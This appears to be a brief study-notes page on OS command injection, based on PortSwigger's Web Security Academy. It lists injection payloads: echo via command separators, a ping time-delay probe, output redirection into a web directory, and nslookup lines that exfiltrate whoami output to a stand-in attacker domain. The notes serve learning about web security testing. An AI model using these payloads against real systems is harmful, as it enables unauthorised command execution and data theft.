OS command injection

Whenever a web app calls out to OS commands (e.g. via a pearl script), malicious commands may be injected. This can potentially lead to a full compromise of the system.

PortSwigger - Web Security Academy - OS command injection

Executing arbitrary commands

param=& echo test &

param=1|echo test

Blind command injections

Detecting vulnerabilities using time delays

& ping -c 10 127.0.0.1 &

Exploiting vulnerabilities by redirecting output

& whoami > /var/www/static/whoami.txt &

Exploiting vulnerabilities using out-of-band (OAST) techniques

& nslookup kgji2ohoyw.web-attacker.com &

Exfiltrate data

& nslookup `whoami`.kgji2ohoyw.web-attacker.com &

Ways of injection

Command separators

Windows and Unix:

&
&&
|
||

Unix only:

;
Newline: 0x0a or
Backticks: `command`
Dollar character: $(command)

PreviousLogic flaws NextHTTP Request smuggling

Last updated 3 years ago